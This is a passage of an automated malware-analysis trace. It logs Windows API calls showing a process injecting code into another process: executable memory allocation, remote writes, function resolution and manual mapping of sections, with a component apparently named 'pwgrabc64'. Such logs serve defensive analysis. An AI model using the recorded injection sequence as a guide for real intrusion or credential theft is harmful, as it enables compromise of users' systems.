lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84f30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0186.006] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0186.006] ResetEvent (hEvent=0x794) returned 1 [0186.006] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.006] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.007] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.007] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84f30 | out: hHeap=0x2150000) returned 1 [0186.007] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.008] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0186.008] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0186.008] lstrlenA (lpString="FreeEnvironmentStringsW") returned 23 [0186.008] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0186.008] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d900*, nSize=0x18, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d900*, lpNumberOfBytesWritten=0xcd978*=0x18) returned 1 [0186.008] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.009] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b70 [0186.009] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0186.009] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84b70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84b70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0186.009] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0186.010] ResetEvent (hEvent=0x794) returned 1 [0186.010] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.010] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.010] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.010] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84b70 | out: hHeap=0x2150000) returned 1 [0186.010] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.011] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0186.011] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0186.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32b3d4f4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0186.011] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f90 [0186.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32b3d4f4, cbMultiByte=-1, lpWideCharStr=0x32e84f90, cchWideChar=11 | out: lpWideCharStr="USER32.dll") returned 11 [0186.011] lstrlenW (lpString="USER32.dll") returned 10 [0186.011] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0186.011] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32e84f90*, nSize=0x16, lpNumberOfBytesWritten=0xcd988 | out: lpBuffer=0x32e84f90*, lpNumberOfBytesWritten=0xcd988*=0x16) returned 1 [0186.011] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8e0, nSize=0xd8, lpNumberOfBytesRead=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesRead=0xcd898*=0xd8) returned 1 [0186.012] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847e0 [0186.012] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0186.012] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e847e0*, nSize=0x18, lpNumberOfBytesWritten=0xcd898 | out: lpBuffer=0x32e847e0*, lpNumberOfBytesWritten=0xcd898*=0x18) returned 1 [0186.012] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8e0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesWritten=0xcd898*=0xd8) returned 1 [0186.017] ResetEvent (hEvent=0x794) returned 1 [0186.017] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.128] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8e0, nSize=0xd8, lpNumberOfBytesRead=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesRead=0xcd898*=0xd8) returned 1 [0186.128] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.128] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e847e0 | out: hHeap=0x2150000) returned 1 [0186.128] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.128] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84f90 | out: hHeap=0x2150000) returned 1 [0186.128] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0186.129] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0186.129] lstrlenA (lpString="GetWindowTextA") returned 14 [0186.129] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0186.129] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d4e4*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d4e4*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0186.129] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.129] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84a20 [0186.130] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0186.130] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84a20*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84a20*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0186.130] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0186.131] ResetEvent (hEvent=0x794) returned 1 [0186.131] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.131] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.131] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.131] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84a20 | out: hHeap=0x2150000) returned 1 [0186.132] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.132] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0186.132] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0186.132] lstrlenA (lpString="GetWindowTextLengthA") returned 20 [0186.132] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0186.132] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d4cc*, nSize=0x15, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d4cc*, lpNumberOfBytesWritten=0xcd978*=0x15) returned 1 [0186.133] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.133] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84840 [0186.133] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0186.133] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84840*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84840*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0186.134] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0186.134] ResetEvent (hEvent=0x794) returned 1 [0186.134] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.135] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.135] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84840 | out: hHeap=0x2150000) returned 1 [0186.135] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.135] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0186.135] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0186.135] lstrlenA (lpString="GetParent") returned 9 [0186.135] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0186.136] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d4c0*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d4c0*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0186.136] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.136] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847e0 [0186.136] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0186.136] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e847e0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e847e0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0186.137] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0186.137] ResetEvent (hEvent=0x794) returned 1 [0186.137] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.138] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0186.138] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.138] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e847e0 | out: hHeap=0x2150000) returned 1 [0186.138] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.138] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x180001000, dwSize=0x5bc00, flAllocationType=0x1000, flProtect=0x4) returned 0x180001000 [0186.138] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x5bc00) returned 0x31f4f720 [0186.145] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x180001000, lpBuffer=0x31f4f720*, nSize=0x5bc00, lpNumberOfBytesWritten=0xcdb88 | out: lpBuffer=0x31f4f720*, lpNumberOfBytesWritten=0xcdb88*=0x5bc00) returned 1 [0186.151] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x180001000, lpBuffer=0x32ac5b70*, nSize=0x5bc00, lpNumberOfBytesWritten=0xcdb88 | out: lpBuffer=0x32ac5b70*, lpNumberOfBytesWritten=0xcdb88*=0x5bc00) returned 1 [0186.293] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x18005d000, dwSize=0x1c400, flAllocationType=0x1000, flProtect=0x4) returned 0x18005d000 [0186.293] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x31f4f720, Size=0x1c400) returned 0x31f4f720 [0186.293] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x18005d000, lpBuffer=0x31f4f720*, nSize=0x1c400, lpNumberOfBytesWritten=0xcdb88 | out: lpBuffer=0x31f4f720*, lpNumberOfBytesWritten=0xcdb88*=0x1c400) returned 1 [0186.297] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x18005d000, lpBuffer=0x32b21770*, nSize=0x1c400, lpNumberOfBytesWritten=0xcdb88 | out: lpBuffer=0x32b21770*, lpNumberOfBytesWritten=0xcdb88*=0x1c400) returned 1 [0186.299] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x18007a000, dwSize=0x2a0c, flAllocationType=0x1000, flProtect=0x4) returned 0x18007a000 [0186.299] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x31f4f720, Size=0x2a10) returned 0x31f4f720 [0186.299] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x18007a000, lpBuffer=0x31f4f720*, nSize=0x2a0c, lpNumberOfBytesWritten=0xcdb88 | out: lpBuffer=0x31f4f720*, lpNumberOfBytesWritten=0xcdb88*=0x2a0c) returned 1 [0186.300] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x18007a000, lpBuffer=0x32b3db70*, nSize=0xe00, lpNumberOfBytesWritten=0xcdb88 | out: lpBuffer=0x32b3db70*, lpNumberOfBytesWritten=0xcdb88*=0xe00) returned 1 [0186.301] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x18007d000, dwSize=0x3600, flAllocationType=0x1000, flProtect=0x4) returned 0x18007d000 [0186.301] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x31f4f720, Size=0x3600) returned 0x31f4f720 [0186.301] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x18007d000, lpBuffer=0x31f4f720*, nSize=0x3600, lpNumberOfBytesWritten=0xcdb88 | out: lpBuffer=0x31f4f720*, lpNumberOfBytesWritten=0xcdb88*=0x3600) returned 1 [0186.302] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x18007d000, lpBuffer=0x32b3e970*, nSize=0x3600, lpNumberOfBytesWritten=0xcdb88 | out: lpBuffer=0x32b3e970*, lpNumberOfBytesWritten=0xcdb88*=0x3600) returned 1 [0186.303] VirtualProtectEx (in: hProcess=0x6f4, lpAddress=0x180001000, dwSize=0x5bb40, flNewProtect=0x20, lpflOldProtect=0xcdb94 | out: lpflOldProtect=0xcdb94*=0x4) returned 1 [0186.303] VirtualProtectEx (in: hProcess=0x6f4, lpAddress=0x18005d000, dwSize=0x1c23a, flNewProtect=0x2, lpflOldProtect=0xcdb94 | out: lpflOldProtect=0xcdb94*=0x4) returned 1 [0186.303] VirtualProtectEx (in: hProcess=0x6f4, lpAddress=0x18007a000, dwSize=0x2a0c, flNewProtect=0x4, lpflOldProtect=0xcdb94 | out: lpflOldProtect=0xcdb94*=0x4) returned 1 [0186.304] VirtualProtectEx (in: hProcess=0x6f4, lpAddress=0x18007d000, dwSize=0x34e0, flNewProtect=0x2, lpflOldProtect=0xcdb94 | out: lpflOldProtect=0xcdb94*=0x4) returned 1 [0186.304] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0186.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77de0 [0186.304] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0186.304] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32e77de0*, nSize=0x28, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32e77de0*, lpNumberOfBytesWritten=0xcd9e8*=0x28) returned 1 [0186.305] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0186.306] ResetEvent (hEvent=0x794) returned 1 [0186.306] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.488] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0186.488] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.488] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77de0 | out: hHeap=0x2150000) returned 1 [0186.488] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x31f4f720 | out: hHeap=0x2150000) returned 1 [0186.504] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ac5770 | out: hHeap=0x2150000) returned 1 [0186.540] lstrlenA (lpString="pwgrabc64") returned 9 [0186.540] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0186.540] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32e80c50*, nSize=0xa, lpNumberOfBytesWritten=0xce148 | out: lpBuffer=0x32e80c50*, lpNumberOfBytesWritten=0xce148*=0xa) returned 1 [0186.541] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0186.541] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0xce600*, nSize=0x400, lpNumberOfBytesWritten=0xce148 | out: lpBuffer=0xce600*, lpNumberOfBytesWritten=0xce148*=0x400) returned 1 [0186.542] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x188, flAllocationType=0x3000, flProtect=0x40) returned 0x4b0000 [0186.542] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x4b0000, lpBuffer=0xce3f8*, nSize=0x188, lpNumberOfBytesWritten=0xce148 | out: lpBuffer=0xce3f8*, lpNumberOfBytesWritten=0xce148*=0x188) returned 1 [0186.543] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xce0a0, nSize=0xd8, lpNumberOfBytesRead=0xce058 | out: lpBuffer=0xce0a0*, lpNumberOfBytesRead=0xce058*=0xd8) returned 1 [0186.543] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e72340 [0186.543] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x40) returned 0x4c0000 [0186.543] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x4c0000, lpBuffer=0x32e72340*, nSize=0x50, lpNumberOfBytesWritten=0xce058 | out: lpBuffer=0x32e72340*, lpNumberOfBytesWritten=0xce058*=0x50) returned 1 [0186.544] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xce0a0*, nSize=0xd8, lpNumberOfBytesWritten=0xce058 | out: lpBuffer=0xce0a0*, lpNumberOfBytesWritten=0xce058*=0xd8) returned 1 [0186.545] ResetEvent (hEvent=0x794) returned 1 [0186.545] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.588] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xce0a0, nSize=0xd8, lpNumberOfBytesRead=0xce058 | out: lpBuffer=0xce0a0*, lpNumberOfBytesRead=0xce058*=0xd8) returned 1 [0186.588] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x4c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.588] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72340 | out: hHeap=0x2150000) returned 1 [0186.588] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0xce600, nSize=0x400, lpNumberOfBytesRead=0xce1a8 | out: lpBuffer=0xce600*, lpNumberOfBytesRead=0xce1a8*=0x400) returned 1 [0186.589] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.589] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce028 | out: lpSystemTimeAsFileTime=0xce028*(dwLowDateTime=0xfbbac8d1, dwHighDateTime=0x1d7b3c9)) [0186.589] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85170 [0186.589] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32348160 [0186.589] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0186.590] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.590] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x20, dwFlags=0x0) returned 1 [0186.590] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84750 [0186.590] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e84750, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84750, pdwDataLen=0xcdf6c) returned 1 [0186.590] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.590] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0186.590] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.591] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.591] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x40, dwFlags=0x0) returned 1 [0186.591] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847e0 [0186.591] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32e847e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e847e0, pdwDataLen=0xcdf6c) returned 1 [0186.591] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.591] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.591] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.591] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.591] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x60, dwFlags=0x0) returned 1 [0186.591] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84e10 [0186.591] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e84e10, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84e10, pdwDataLen=0xcdf6c) returned 1 [0186.592] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.592] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.592] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0186.592] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.592] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x80, dwFlags=0x0) returned 1 [0186.592] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.592] RtlAllocateHeap 